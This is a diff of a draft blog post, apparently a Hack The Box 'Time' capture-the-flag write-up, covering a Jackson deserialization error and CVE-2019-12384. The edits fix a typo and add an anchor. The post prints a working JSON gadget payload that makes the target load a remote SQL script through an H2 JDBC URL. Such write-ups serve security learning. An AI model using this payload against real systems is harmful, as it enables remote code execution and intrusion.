tpetersonkth/tpetersonkth.github.io/_drafts/HTB-Time-Writeup.md

 Validation failed: Unhandled Java exception: com.fasterxml.jackson.databind.exc.MismatchedInputException: Unexpected token (START_OBJECT), expected START_ARRAY: need JSON Array to contain As.WRAPPER_ARRAY type information for class java.lang.Object
 {% endhighlight %}

 After some googling, it is possible to find [a couple of CVE:s](https://cve.mitre.org/cgi-bin/cvekey.cgi?keyword=jackson) for the Jackson library.
 One of the CVE:s which can be identified is [CVE-2019-12384](https://nvd.nist.gov/vuln/detail/CVE-2019-12384).
 When searching for more information about this vulnerability, it is possible to find a [blog post](https://blog.doyensec.com/2019/07/22/jackson-gadgets.html) explaining how to exploit the vulnerability.
-In the blog post, the authors explain that the CVE enables the execution of arbitrary SQL statements when the Jackson library deserializes and then re-serialize the JSON object below.
+In the blog post, the authors explain that the CVE enables the execution of arbitrary SQL statements when the Jackson library deserializes and then re-serializes the JSON object below.

+<div id="malicious-JSON-object"></div>
 {% highlight JSON linenos %}
 ["ch.qos.logback.core.db.DriverManagerConnectionSource", {"url":"jdbc:h2:mem:;TRACE_LEVEL_SYSTEM_OUT=3;INIT=RUNSCRIPT FROM 'http://localhost:8000/inject.sql'"}]
 {% endhighlight %}